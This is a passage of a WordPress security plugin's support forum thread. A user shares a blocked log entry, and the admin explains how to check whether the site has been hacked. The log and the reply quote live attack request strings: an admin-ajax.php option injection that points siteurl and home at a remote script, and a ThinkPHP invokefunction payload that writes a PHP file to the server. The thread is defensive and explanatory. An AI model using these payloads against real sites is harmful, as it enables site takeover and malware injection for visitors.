Security Log Event Codes

Home Forums BulletProof Security Pro Security Log Event Codes

This topic contains 78 replies, has 16 voices, and was last updated by  AITpro Admin 2 months, 1 week ago.

Viewing 4 posts - 76 through 79 (of 79 total)
  • Author
    Posts
  • #35544

    Bub
    Participant

    Done and done…. Thanks. This topic should now be closed.

    #35545

    Bub
    Participant

    Again, thanks.

    #37723

    sergeykar
    Participant

    I have been seeing this frequently in my security log – and it appears like a hack attempt – not sure what it is because I have not seen this in the past. It appears BPS is doing it’s job – however is there a weakness this attempt is trying to exploit?

    [403 GET Request: 06.08.2019 - 10:15]
    BPS: 3.5
    WP: 5.2.2
    Event Code: WPADMIN-SBR
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: 159.69.154.78
    Host Name: static.78.154.69.159.clients.your-server.de
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
    QUERY_STRING: nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
    #37724

    AITpro Admin
    Keymaster

    This is either a probe looking for existing injected hacker code in your website’s Source Code or a hacker trying to exploit an existing hack injection on your website’s Source Code.  To check if your website is hacked do the steps below:

    1. Go to your website’s home page.
    2. Right mouse click and click View page source (google chrome) or a similar command for other Browsers.
    3. Use your Browser’s Find… command (google chrome – located under settings > Find…) and enter this search string:  nd_options
    4. If you see/find Source Code that looks like this below then your website is hacked.
    5. Let me know if your Browser Find/Search finds any search results or not.

    httx://expat.ca/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=jfjvc.php&vars%5B1%5D%5B%5D=%3C?php%20mb_ereg_replace(, httx://expat.ca/jfjvc.php, httx://expat.ca/wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]httxs://jackielovedogs.com/pret.js?l=1&[nd_options_end_option], httx://expat.ca/wp-admin/admin-post.phpnd_options_value_import_settings=home[nd_options_option_value]httxs://jackielovedogs.com/pret?l=1&[nd_options_end_option],
Viewing 4 posts - 76 through 79 (of 79 total)

You must be logged in to reply to this topic.